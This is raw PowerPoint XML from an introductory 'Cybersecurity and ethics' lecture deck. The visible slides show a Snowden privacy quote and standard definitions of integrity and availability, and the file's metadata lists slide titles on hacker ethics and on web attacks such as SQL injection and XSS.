            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80D8D31-D7F3-4AC9-B655-E9E40EC6DE6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="432000"/>
            <a:ext cx="9786821" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>EDWARD SNOWDEN ABOUT PRIVACY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1060684-CF84-4AC0-B619-B415ADA8F95D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545432" y="1187116"/>
            <a:ext cx="9192126" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>“Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Edward Snowden</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF7221F-95B8-43F4-950C-8752B42A0F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256104" y="5892581"/>
            <a:ext cx="9192126" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://mic.com/articles/119602/in-one-quote-edward-snowden-summed-up-why-our-privacy-is-worth-fighting-for</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366679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502C7FD6-4DEB-414D-AFF3-001A81322882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E84CCC1D-7A84-4A75-B8C1-A121D6939FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>integrity</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8641D57A-3339-4E8D-844C-23DACD36CB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552884" y="1171073"/>
            <a:ext cx="8889332" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0"/>
              <a:t>Data integrity: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0"/>
              <a:t>“The property that data has not been changed, destroyed, or lost in an unauthorized or accidental manner.”</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8684BA13-A16D-454F-9B16-4D5A11A0176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826168" y="3624824"/>
            <a:ext cx="8584532" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0"/>
              <a:t>System integrity: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0"/>
              <a:t>“The quality that a system has when it can perform its intended function in a unimpaired manner, free from deliberate or inadvertent unauthorized manipulation.”</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146190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487BCCD5-FB9B-44E4-8654-6CECA67D18A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172DAD9F-2FD1-4B3D-B4AF-9B8C27F3B8F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>availability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F29EAC-3CBB-4630-BF09-7DD60089C28B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593558" y="1090863"/>
            <a:ext cx="8969542" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“The property of a system or a system resource being accessible and usable upon demand by an authorized system entity, according to performance specifications for the system; i.e., a system is available if it provides services according to the system design whenever users request them.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>[RFC 4949]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3969880106"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Tema di Offic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6129_TF16411245.potx" id="{47F9A720-F984-4589-A575-97B14FDB2390}" vid="{B41ED6FB-41F7-4E8D-89E9-5A13582EC3B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8A784AD-7888-482C-A72A-80D3063962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61CFE-D4DA-4753-A9A5-D482B9609A35}">
  <ds:schemaRef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sharepoint/v3"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="fb0879af-3eba-417a-a55a-ffe6dcd6ca77"/>
    <ds:schemaRef ds:uri="6dc4bcd6-49db-4c07-9060-8acfc67cef9f"/>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403</TotalTime>
  <Words>4262</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>373</Paragraphs>
  <Slides>35</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35</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="40" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Tema di Office</vt:lpstr>
      <vt:lpstr>Cybersecurity and ethics</vt:lpstr>
      <vt:lpstr>credits</vt:lpstr>
      <vt:lpstr>Security: an informal definition</vt:lpstr>
      <vt:lpstr>Security: a formal definition</vt:lpstr>
      <vt:lpstr>Confidentiality</vt:lpstr>
      <vt:lpstr>Confidentiality vs privacy</vt:lpstr>
      <vt:lpstr>EDWARD SNOWDEN ABOUT PRIVACY</vt:lpstr>
      <vt:lpstr>integrity</vt:lpstr>
      <vt:lpstr>availability</vt:lpstr>
      <vt:lpstr>SOME OBSERVATIONS ABOUT SECURITY</vt:lpstr>
      <vt:lpstr>SOME OBSERVATIONS ABOUT SECURITY (PT. 2)</vt:lpstr>
      <vt:lpstr>BUT.. WHAT DOES &lt;&lt;HACKER&gt;&gt; MEANS?</vt:lpstr>
      <vt:lpstr>HACKER ETHICS IN A NUTSHELL</vt:lpstr>
      <vt:lpstr>HACKER ETHICS IN A NUTSHELL (PT. 2)</vt:lpstr>
      <vt:lpstr>Hacker ethics in a nutshell (pt. 3)</vt:lpstr>
      <vt:lpstr>The hacker manifesto</vt:lpstr>
      <vt:lpstr>What is not a hacker: script kiddies</vt:lpstr>
      <vt:lpstr>Black hats: the bad ones</vt:lpstr>
      <vt:lpstr>White hats: the good ones</vt:lpstr>
      <vt:lpstr>Full vs responsible disclosure</vt:lpstr>
      <vt:lpstr>Nation/state hackers: power games.</vt:lpstr>
      <vt:lpstr>Advanced persistent threat focus</vt:lpstr>
      <vt:lpstr>Other subclasses of hackers</vt:lpstr>
      <vt:lpstr>John thomas draper, Cap'n Crunch</vt:lpstr>
      <vt:lpstr>Kevin mitnick, the condor</vt:lpstr>
      <vt:lpstr>Social engineering: the human factor.</vt:lpstr>
      <vt:lpstr>Social engineering: what is that?</vt:lpstr>
      <vt:lpstr>A closer look to exploits: sql injection</vt:lpstr>
      <vt:lpstr>A closer look to exploits: sql injection (PT. 2)</vt:lpstr>
      <vt:lpstr>A closer look to exploits: reflected xss</vt:lpstr>
      <vt:lpstr>A closer look to exploits: reflected xss (PT. 2)</vt:lpstr>
      <vt:lpstr>A closer look to exploits: reflected xss (PT. 3)</vt:lpstr>
      <vt:lpstr>A closer look to exploits: stored xss</vt:lpstr>
      <vt:lpstr>Hacking team: also known as hacked team</vt:lpstr>
      <vt:lpstr>grazie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and ethics</dc:title>
  <dc:creator>Master Guru</dc:creator>
  <cp:lastModifiedBy>MARCO URBANO-CYBERHACK</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-05T15:00:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-05T10:36:14Z</dcterms:modified>
</cp:coreProperties>
</file>